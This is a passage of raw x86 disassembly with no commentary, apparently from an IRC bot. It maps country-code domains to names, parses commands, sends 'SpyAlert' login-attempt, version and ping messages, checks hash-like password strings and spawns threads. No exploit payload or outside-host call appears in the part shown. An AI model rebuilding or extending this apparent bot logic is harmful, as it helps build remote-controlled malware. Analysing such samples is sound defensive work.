push offset a_lv ; ".lv"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419651
mov eax, offset aLatvia ; "Latvia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419651: ; CODE XREF: sub_41912B+51A�j
push offset off_44240C
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41966C
mov eax, offset aMalta ; "Malta"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41966C: ; CODE XREF: sub_41912B+535�j
push offset a_my ; ".my"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419687
mov eax, offset aMalaysia ; "Malaysia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419687: ; CODE XREF: sub_41912B+550�j
push offset a_ms ; ".ms"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4196A2
mov eax, offset aMicrosoftLine ; "Microsoft Line"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4196A2: ; CODE XREF: sub_41912B+56B�j
push offset a_nl ; ".nl"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4196BD
mov eax, offset aNetherlands ; "Netherlands"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4196BD: ; CODE XREF: sub_41912B+586�j
push offset a_no ; ".no"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4196D8
mov eax, offset aNorway ; "Norway"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4196D8: ; CODE XREF: sub_41912B+5A1�j
push offset a_nu ; ".nu"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4196F3
loc_4196E9: ; CODE XREF: sub_41912B+499�j
mov eax, offset aJapan ; "Japan"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4196F3: ; CODE XREF: sub_41912B+5BC�j
push offset a_nz ; ".nz"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41970E
mov eax, offset aNewZealand ; "New Zealand"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41970E: ; CODE XREF: sub_41912B+5D7�j
push offset a_pl ; ".pl"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419729
loc_41971F: ; CODE XREF: sub_41912B+29E�j
mov eax, offset aPoland ; "Poland"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419729: ; CODE XREF: sub_41912B+5F2�j
push offset a_pt ; ".pt"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419744
mov eax, offset aPortugal ; "Portugal"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419744: ; CODE XREF: sub_41912B+60D�j
push offset a_ro ; ".ro"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41975F
mov eax, offset aRomania ; "Romania"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41975F: ; CODE XREF: sub_41912B+628�j
push offset dword_44237C
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_419821
push offset off_442378
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41978F
mov eax, offset aSaudiArabia ; "Saudi Arabia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41978F: ; CODE XREF: sub_41912B+658�j
push offset a_se ; ".se"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4197AA
mov eax, offset aSweden ; "Sweden"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4197AA: ; CODE XREF: sub_41912B+673�j
push offset a_sg ; ".sg"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4197C5
mov eax, offset aSingapore ; "Singapore"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4197C5: ; CODE XREF: sub_41912B+68E�j
push offset a_si ; ".si"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4197E0
mov eax, offset aSlovenia ; "Slovenia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4197E0: ; CODE XREF: sub_41912B+6A9�j
push offset a_sk ; ".sk"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4197FB
mov eax, offset aSlovakia ; "Slovakia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_4197FB: ; CODE XREF: sub_41912B+6C4�j
push offset a_st ; ".st"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_4198BD
push offset a_su ; ".su"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41982B
loc_419821: ; CODE XREF: sub_41912B+643�j
mov eax, offset aRussia ; "Russia"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41982B: ; CODE XREF: sub_41912B+6F4�j
push offset a_th ; ".th"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419846
mov eax, offset aThailand ; "Thailand"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419846: ; CODE XREF: sub_41912B+70F�j
push offset a_tk ; ".tk"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419861
mov eax, offset aTokelauIsland ; "Tokelau Island"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_419861: ; CODE XREF: sub_41912B+72A�j
push offset a_tr ; ".tr"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41987C
mov eax, offset aTurkey ; "Turkey"
jmp loc_41990F
; ---------------------------------------------------------------------------
loc_41987C: ; CODE XREF: sub_41912B+745�j
push offset a_tw ; ".tw"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419894
mov eax, offset aTaiwan ; "Taiwan"
jmp short loc_41990F
; ---------------------------------------------------------------------------
loc_419894: ; CODE XREF: sub_41912B+760�j
push offset off_4422DC
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4198AC
mov eax, offset aUkraine ; "Ukraine"
jmp short loc_41990F
; ---------------------------------------------------------------------------
loc_4198AC: ; CODE XREF: sub_41912B+778�j
push offset dword_4422D0
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4198C4
loc_4198BD: ; CODE XREF: sub_41912B+202�j
; sub_41912B+6DF�j
mov eax, offset off_43CF08
jmp short loc_41990F
; ---------------------------------------------------------------------------
loc_4198C4: ; CODE XREF: sub_41912B+790�j
push offset off_4422CC
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4198DC
mov eax, offset aSouthAfrica ; "South Africa"
jmp short loc_41990F
; ---------------------------------------------------------------------------
loc_4198DC: ; CODE XREF: sub_41912B+7A8�j
push offset a_wap ; ".wap"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4198F4
mov eax, offset aWirelessAccess ; "WireLess Access Point"
jmp short loc_41990F
; ---------------------------------------------------------------------------
loc_4198F4: ; CODE XREF: sub_41912B+7C0�j
push offset dword_442294
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
mov eax, offset dword_442284
jnz short loc_41990F
loc_41990A: ; CODE XREF: sub_41912B+2E�j
mov eax, offset dword_43E558
loc_41990F: ; CODE XREF: sub_41912B+4A�j
; sub_41912B+65�j ...
pop esi
leave
retn
sub_41912B endp
; =============== S U B R O U T I N E =======================================
sub_419912 proc near ; CODE XREF: sub_418010+1D2�p
; .text:0042EF2F�j
var_4 = byte ptr -4
push ecx
push esi
mov esi, ecx
mov eax, [esi+4]
push eax
mov ecx, [eax]
lea eax, [esp+0Ch+var_4]
push ecx
push eax
mov ecx, esi
call sub_419978
push dword ptr [esi+4]
call sub_421C78
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
pop ecx
retn
sub_419912 endp
; =============== S U B R O U T I N E =======================================
sub_41993D proc near ; CODE XREF: sub_418436+1BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_4]
push edi
mov ebx, ecx
push dword ptr [esi+4]
push esi
call sub_4199B0
mov [esi+4], eax
mov ecx, [eax+4]
lea edi, [eax+8]
test edi, edi
mov [ecx], eax
jz short loc_419967
mov esi, [esp+0Ch+arg_8]
push 61h
pop ecx
rep movsd
loc_419967: ; CODE XREF: sub_41993D+1F�j
mov ecx, [esp+0Ch+arg_0]
inc dword ptr [ebx+8]
pop edi
pop esi
mov [ecx], eax
mov eax, ecx
pop ebx
retn 0Ch
sub_41993D endp
; =============== S U B R O U T I N E =======================================
sub_419978 proc near ; CODE XREF: sub_419912+12�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_4]
push edi
mov edi, ecx
jmp short loc_41999F
; ---------------------------------------------------------------------------
loc_419982: ; CODE XREF: sub_419978+2B�j
mov eax, esi
mov esi, [esi]
push eax
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
mov [ecx+4], edx
call sub_421C78
dec dword ptr [edi+8]
pop ecx
loc_41999F: ; CODE XREF: sub_419978+8�j
cmp esi, [esp+8+arg_8]
jnz short loc_419982
mov eax, [esp+8+arg_0]
pop edi
mov [eax], esi
pop esi
retn 0Ch
sub_419978 endp
; =============== S U B R O U T I N E =======================================
sub_4199B0 proc near ; CODE XREF: sub_418010+54�p
; sub_41993D+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 18Ch
call sub_423F55
pop ecx
mov ecx, [esp+arg_0]
test ecx, ecx
jnz short loc_4199C5
mov ecx, eax
loc_4199C5: ; CODE XREF: sub_4199B0+11�j
mov [eax], ecx
mov ecx, [esp+arg_4]
test ecx, ecx
jnz short loc_4199D1
mov ecx, eax
loc_4199D1: ; CODE XREF: sub_4199B0+1D�j
mov [eax+4], ecx
retn 8
sub_4199B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199D7 proc near ; CODE XREF: sub_403A63+5D�p
; sub_419B2F+7E�p
var_158 = byte ptr -158h
var_110 = byte ptr -110h
var_10A = byte ptr -10Ah
var_109 = byte ptr -109h
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_101 = byte ptr -101h
var_F7 = byte ptr -0F7h
var_F6 = byte ptr -0F6h
var_F5 = byte ptr -0F5h
var_F3 = byte ptr -0F3h
var_F2 = byte ptr -0F2h
var_F0 = byte ptr -0F0h
var_EA = byte ptr -0EAh
var_E9 = byte ptr -0E9h
var_E6 = byte ptr -0E6h
var_E5 = byte ptr -0E5h
var_E4 = byte ptr -0E4h
var_E2 = byte ptr -0E2h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 158h
push ebx
push esi
push edi
xor ebx, ebx
push 100h
lea eax, [ebp+var_158]
push ebx
push eax
call sub_4221F0
mov esi, [ebp+arg_8]
add esp, 0Ch
cmp esi, ebx
jl short loc_419A60
loc_419A01: ; CODE XREF: sub_4199D7+87�j
mov eax, [ebp+arg_4]
lea ecx, [eax+esi*4]
mov eax, [ecx]
cmp eax, ebx
jz short loc_419A5D
mov dl, [eax]
cmp dl, 2Dh
jnz short loc_419A60
cmp [eax+2], bl
jnz short loc_419A27
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_158], 1
jmp short loc_419A4F
; ---------------------------------------------------------------------------
loc_419A27: ; CODE XREF: sub_4199D7+40�j
cmp dl, 2Dh
jnz short loc_419A60
cmp byte ptr [eax+2], 3Ah
jnz short loc_419A60
cmp [eax+4], bl
jnz short loc_419A60
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_158], 1
cmp byte ptr [eax+1], 72h
jnz short loc_419A4F
mov dl, [eax+3]
mov [ebp+var_38], dl
loc_419A4F: ; CODE XREF: sub_4199D7+4E�j
; sub_4199D7+70�j
mov [eax], bl
mov eax, [ecx]
mov [eax+1], bl
mov eax, [ecx]
mov [eax+2], bl
mov [ecx], ebx
loc_419A5D: ; CODE XREF: sub_4199D7+34�j
dec esi
jns short loc_419A01
loc_419A60: ; CODE XREF: sub_4199D7+28�j
; sub_4199D7+3B�j ...
movzx eax, [ebp+var_E5]
mov [ebp+var_58], eax
push 16h
movzx eax, [ebp+var_EA]
movzx ecx, [ebp+var_105]
mov [ebp+var_54], eax
mov [ebp+var_48], ecx
movzx eax, [ebp+var_F0]
mov [ebp+var_50], eax
mov [ebp+var_2C], ecx
movzx eax, [ebp+var_E2]
movzx ecx, [ebp+var_F7]
movzx edx, [ebp+var_109]
mov [ebp+var_4C], eax
mov [ebp+var_1C], ecx
movzx eax, [ebp+var_F2]
movzx ecx, [ebp+var_F6]
mov [ebp+var_44], eax
mov [ebp+var_18], ecx
movzx eax, [ebp+var_E9]
movzx ecx, [ebp+var_F5]
mov [ebp+var_30], edx
mov [ebp+var_40], eax
movzx edx, [ebp+var_110]
movzx eax, [ebp+var_101]
mov [ebp+var_14], ecx
mov [ebp+var_28], edx
movzx ecx, [ebp+var_F3]
movzx edx, [ebp+var_10A]
mov [ebp+var_34], eax
mov [ebp+var_C], ecx
movzx eax, [ebp+var_E6]
movzx ecx, [ebp+var_E4]
mov [ebp+var_20], edx
mov [ebp+var_3C], eax
movzx edx, [ebp+var_106]
mov [ebp+var_10], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov [ebp+var_8], ecx
pop ecx
lea esi, [ebp+var_58]
mov edi, eax
mov [ebp+var_24], edx
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_4199D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B2F proc near ; DATA XREF: sub_41A1C8+18�o
var_658 = byte ptr -658h
var_258 = byte ptr -258h
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 658h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
inc esi
cmp byte ptr [esi+1], 0
jz loc_419EDE
cmp byte ptr [esi], 2Bh
jnz short loc_419B6C
push offset byte_44D6A4
push offset dword_442740
push esi
call sub_41F167
push esi
push offset dword_4395E8
call sub_41D94C
add esp, 14h
loc_419B6C: ; CODE XREF: sub_419B2F+1D�j
lea eax, [ebp+var_658]
push esi
push eax
call dword_42F04C ; lstrcpyA
push 40h
lea eax, [ebp+var_158]
push esi
push eax
call sub_41EF08
mov cl, [ebp+var_658]
add esp, 0Ch
cmp cl, byte_439016
mov [ebp+arg_0], eax
jnz loc_419DE5
push eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_58]
push eax
call sub_4199D7
add esp, 0Ch
mov esi, eax
lea edi, [ebp+var_58]
push 16h
pop ecx
rep movsd
xor edi, edi
cmp [ebp+var_158], edi
jz loc_419EDE
mov eax, [ebp+var_158]
mov al, [eax]
cmp al, byte_439016
jnz short loc_419C42
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
inc [ebp+var_158]
mov ecx, esi
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_40FE51
test eax, eax
mov ecx, esi
jz short loc_419C49
call sub_41111B
push eax
push dword ptr [ebx+0Ch]
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_419C17
mov eax, [ebx]
mov [ebx+0Ch], eax
loc_419C17: ; CODE XREF: sub_419B2F+E1�j
push edi
lea eax, [ebp+var_658]
sub esp, 58h
lea esi, [ebp+var_58]
push 16h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push ebx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_158]
push eax
call sub_403B2C
add esp, 70h
loc_419C42: ; CODE XREF: sub_419B2F+AC�j
; sub_419B2F+17D�j ...
xor eax, eax
loc_419C44: ; CODE XREF: sub_419B2F+3B2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419C49: ; CODE XREF: sub_419B2F+CD�j
call sub_41111B
push eax
push dword ptr [ebx+0Ch]
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_419C98
mov ecx, esi
call sub_40FEAB
test eax, eax
lea eax, [ebp+var_658]
push eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aFr5ye08wltp1mn ; "fr5ye08Wltp1Mnsrm1FhS.k."
push offset aSSpyalertSS@SS ; "%s SpyAlert: [%s!%s@%s] -> (Sent PM: \"%"...
jnz loc_419D2C
loc_419C85: ; CODE XREF: sub_419B2F+1F7�j
push offset dword_439650
push esi
call sub_4104F6
add esp, 20h
jmp loc_419EDE
; ---------------------------------------------------------------------------
loc_419C98: ; CODE XREF: sub_419B2F+12C�j
push [ebp+var_158]
push offset aC7rq4Xpvel_ ; "c7RQ4/xPvel."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_419C42
cmp [ebp+var_154], edi
jz loc_419EDE
push dword ptr [ebx+8]
lea eax, [ebp+var_258]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset dword_442734
push 100h
push eax
call sub_42219B
add esp, 18h
cmp dword_43C174, edi
jle short loc_419D05
loc_419CE3: ; CODE XREF: sub_419B2F+1D4�j
lea eax, [ebp+var_258]
push eax
push dword ptr loc_43904C[edi*4]
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jnz short loc_419D37
inc edi
cmp edi, dword_43C174
jl short loc_419CE3
loc_419D05: ; CODE XREF: sub_419B2F+1B2�j
; sub_419B2F+223�j
mov ecx, esi
call sub_40FEAB
push [ebp+var_154]
test eax, eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aFr5ye08wltp1mn ; "fr5ye08Wltp1Mnsrm1FhS.k."
push offset aSSpyalertLogin ; "%s SpyAlert: Login Attempt -> [%s!%s@%s"...
jz loc_419C85
loc_419D2C: ; CODE XREF: sub_419B2F+150�j
push esi
call sub_40FF47
jmp loc_419EDB
; ---------------------------------------------------------------------------
loc_419D37: ; CODE XREF: sub_419B2F+1CB�j
push [ebp+var_154]
call sub_41CE88
push eax
push offset loc_4395A0
call sub_422760
add esp, 0Ch
test eax, eax
jnz short loc_419D05
push dword ptr [ebx+8]
mov ecx, esi
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_40FCF7
cmp eax, 0FFFFFFFFh
mov esi, offset aH08_Drzwx_ ; "h/08./drzWX."
jnz short loc_419DA6
cmp [ebp+var_58], 0
mov edi, offset aSFullTryLater ; "%s Full try Later!"
jnz short loc_419D8E
cmp [ebp+var_54], 0
jnz short loc_419D98
push esi
push edi
push dword ptr [ebx+0Ch]
push [ebp+arg_8]
call sub_4104F6
add esp, 10h
loc_419D8E: ; CODE XREF: sub_419B2F+247�j
cmp [ebp+var_54], 0
jz loc_419EDE
loc_419D98: ; CODE XREF: sub_419B2F+24D�j
push esi
push edi
push dword ptr [ebx]
push [ebp+arg_8]
call sub_4104F6
jmp short loc_419DDD
; ---------------------------------------------------------------------------
loc_419DA6: ; CODE XREF: sub_419B2F+23C�j
cmp [ebp+var_58], 0
mov edi, offset aSOk ; "%s OK"
jnz short loc_419DC7
cmp [ebp+var_54], 0
jnz short loc_419DD1
push esi
push edi
push dword ptr [ebx+0Ch]
push [ebp+arg_8]
call sub_4104F6
add esp, 10h
loc_419DC7: ; CODE XREF: sub_419B2F+280�j
cmp [ebp+var_54], 0
jz loc_419EDE
loc_419DD1: ; CODE XREF: sub_419B2F+286�j
push esi
push edi
push dword ptr [ebx]
push [ebp+arg_8]
call sub_410491
loc_419DDD: ; CODE XREF: sub_419B2F+275�j
add esp, 10h
jmp loc_419EDE
; ---------------------------------------------------------------------------
loc_419DE5: ; CODE XREF: sub_419B2F+6C�j
mov ebx, [ebp+arg_8]
mov ecx, ebx
call sub_41111B
mov esi, [ebp+arg_4]
mov edi, dword_42F070
push eax
push dword ptr [esi+0Ch]
call edi ; dword_42F070
test eax, eax
jnz loc_419EDE
push [ebp+var_158]
push offset dword_442728
call edi ; dword_42F070
test eax, eax
jnz short loc_419E5E
push (offset loc_439043+1)
push offset dword_442718
push dword ptr [esi]
push ebx
call sub_410491
add esp, 10h
mov ecx, ebx
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40FE51
test eax, eax
jnz loc_419EDE
mov ecx, ebx
call sub_40FEAB
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aFr5ye08wltp1mn ; "fr5ye08Wltp1Mnsrm1FhS.k."
push offset aSVersionReques ; "%s Version request from: [%s!%s@%s]!"
jmp short loc_419EC1
; ---------------------------------------------------------------------------
loc_419E5E: ; CODE XREF: sub_419B2F+2E6�j
push [ebp+var_158]
push offset dword_4426E8
call edi ; dword_42F070
test eax, eax
jnz loc_419C42
cmp [ebp+var_154], eax
jz loc_419C42
push [ebp+var_154]
push offset dword_4426DC
push dword ptr [esi]
push ebx
call sub_410491
add esp, 10h
mov ecx, ebx
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40FE51
test eax, eax
jnz short loc_419EDE
mov ecx, ebx
call sub_40FEAB
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aFr5ye08wltp1mn ; "fr5ye08Wltp1Mnsrm1FhS.k."
push offset aSPingRequestFr ; "%s Ping request from: [%s!%s@%s]!"
loc_419EC1: ; CODE XREF: sub_419B2F+32D�j
test eax, eax
jz short loc_419ED0
push ebx
call sub_40FF47
add esp, 18h
jmp short loc_419EDE
; ---------------------------------------------------------------------------
loc_419ED0: ; CODE XREF: sub_419B2F+394�j
push offset dword_439650
push ebx
call sub_4104F6
loc_419EDB: ; CODE XREF: sub_419B2F+203�j
add esp, 1Ch
loc_419EDE: ; CODE XREF: sub_419B2F+14�j
; sub_419B2F+98�j ...
xor eax, eax
inc eax
jmp loc_419C44
sub_419B2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EE6 proc near ; DATA XREF: sub_41A1C8+29�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push edi
mov edi, [ebp+arg_8]
mov ecx, edi
call sub_41111B
push eax
push [ebp+arg_0]
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_419F65
push 2
lea eax, [ebp+var_8]
push [ebp+arg_0]
push eax
call sub_41EF08
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_419F65
cmp [ebp+var_4], 0
jz short loc_419F65
push esi
mov esi, offset dword_439638
push esi
push [ebp+var_8]
call sub_422760
pop ecx
pop ecx
test eax, eax
mov ecx, edi
jnz short loc_419F46
push offset dword_43963C
push esi
call sub_410720
jmp short loc_419F4E
; ---------------------------------------------------------------------------
loc_419F46: ; CODE XREF: sub_419EE6+51�j
push [ebp+var_8]
call sub_4106F9
loc_419F4E: ; CODE XREF: sub_419EE6+5E�j
mov eax, [ebp+arg_4]
push dword ptr [eax]
push offset a__0 ; "."
push [ebp+var_8]
push edi
call sub_4104F6
add esp, 10h
pop esi
loc_419F65: ; CODE XREF: sub_419EE6+1D�j
; sub_419EE6+34�j ...
xor eax, eax
pop edi
leave
retn
sub_419EE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F6A proc near ; DATA XREF: sub_41A1C8+3A�o
var_132C = byte ptr -132Ch
var_32C = byte ptr -32Ch
var_12C = dword ptr -12Ch
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 132Ch
call sub_4220C0
push esi
push edi
push 1000h
lea eax, [ebp+var_132C]
push [ebp+arg_0]
push eax
call sub_4222F0
lea eax, [ebp+var_132C]
push 3
push eax
lea eax, [ebp+var_C]
push eax
call sub_41EF08
add esp, 18h
cmp [ebp+var_C], 0
jz loc_41A0E0
cmp [ebp+var_8], 0
jz loc_41A0E0
mov ecx, [ebp+arg_8]
call sub_41111B
push eax
push [ebp+var_C]
call sub_422760
pop ecx
pop ecx
test eax, eax
push 10h
lea eax, [ebp+var_2C]
jnz short loc_419FD7
push [ebp+var_8]
jmp short loc_419FDA
; ---------------------------------------------------------------------------
loc_419FD7: ; CODE XREF: sub_419F6A+66�j
push [ebp+var_C]
loc_419FDA: ; CODE XREF: sub_419F6A+6B�j
push eax
call sub_4222F0
add esp, 0Ch
push 3Ah
push [ebp+arg_0]
call sub_4233B0
mov esi, eax
pop ecx
inc esi
pop ecx
cmp byte ptr [esi], 2Bh
jnz short loc_41A03C
push offset dword_442740
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41A03C
push esi
call sub_422120
cmp eax, 6
pop ecx
jbe short loc_41A03C
push esi
call sub_422120
dec eax
push eax
push 1
push esi
call sub_41F133
mov edi, eax
add esp, 10h
test edi, edi
jz short loc_41A03C
push edi
push offset dword_4395E8
call sub_41D94C
pop ecx
mov esi, edi
pop ecx
loc_41A03C: ; CODE XREF: sub_419F6A+8B�j
; sub_419F6A+9C�j ...
mov edi, offset asc_4388F4 ; "|"
push edi
push esi
call sub_422248
pop ecx
xor esi, esi
pop ecx
mov [ebp+var_12C], eax
inc esi
loc_41A053: ; CODE XREF: sub_419F6A+102�j
push edi
push 0
call sub_422248
pop ecx
mov [ebp+esi*4+var_12C], eax
test eax, eax
pop ecx
jz short loc_41A06E
inc esi
cmp esi, 40h
jl short loc_41A053
loc_41A06E: ; CODE XREF: sub_419F6A+FC�j
lea eax, [ebp+var_2C]
xor edi, edi
mov [ebp+var_10], eax
mov eax, offset aTopic_0 ; "topic"
test esi, esi
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
jle short loc_41A0E0
loc_41A088: ; CODE XREF: sub_419F6A+174�j
mov eax, [ebp+edi*4+var_12C]
test eax, eax
jz short loc_41A0DB
push eax
lea eax, [ebp+var_32C]
push offset aS_1 ; "%s"
push eax
call sub_422063
mov al, [ebp+var_32C]
add esp, 0Ch
cmp al, byte_439016
jnz short loc_41A0DB
push 1388h
call dword_42F15C ; Sleep
push 1
push 1
push [ebp+arg_8]
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_32C]
push eax
call sub_403A63
add esp, 14h
loc_41A0DB: ; CODE XREF: sub_419F6A+127�j
; sub_419F6A+14A�j
inc edi
cmp edi, esi
jl short loc_41A088
loc_41A0E0: ; CODE XREF: sub_419F6A+3C�j
; sub_419F6A+46�j ...
pop edi
xor eax, eax
pop esi
leave
retn
sub_419F6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0E6 proc near ; DATA XREF: sub_41A1C8+89�o
var_240 = dword ptr -240h
var_184 = dword ptr -184h
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 240h
push esi
lea eax, [ebp+arg_8]
push edi
mov edi, [ebp+arg_8]
xor esi, esi
push eax
lea eax, [ebp+var_240]
push esi
push eax
push offset loc_40FB2D
push esi
push esi
mov [ebp+var_240], edi
mov [ebp+var_184], esi
call dword_42F158 ; CreateThread
jmp short loc_41A125
; ---------------------------------------------------------------------------
loc_41A11D: ; CODE XREF: sub_41A0E6+45�j
push 32h
call dword_42F15C ; Sleep
loc_41A125: ; CODE XREF: sub_41A0E6+35�j
cmp [ebp+var_184], esi
jz short loc_41A11D
mov ecx, edi
call sub_41111B
push eax
mov ecx, edi
call sub_4105B8
push offset byte_455608
mov ecx, edi
call sub_4107E8
push offset dword_43963C
push offset dword_439638
mov ecx, edi
call sub_410720
pop edi
xor eax, eax
pop esi
leave
retn
sub_41A0E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A15F proc near ; DATA XREF: sub_41A1C8+78�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_41EF08
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_41A1A6
cmp [ebp+var_4], 0
jz short loc_41A1A6
mov esi, offset byte_455609
push offset byte_44D6A4
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41A1A6
mov ecx, [ebp+arg_8]
push 0
push esi
push [ebp+var_4]
call sub_410795
loc_41A1A6: ; CODE XREF: sub_41A15F+1B�j
; sub_41A15F+21�j ...
xor eax, eax
pop esi
leave
retn
sub_41A15F endp
; =============== S U B R O U T I N E =======================================
sub_41A1AB proc near ; DATA XREF: sub_41A1C8+B5�o
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push 5
push 7
call sub_410806
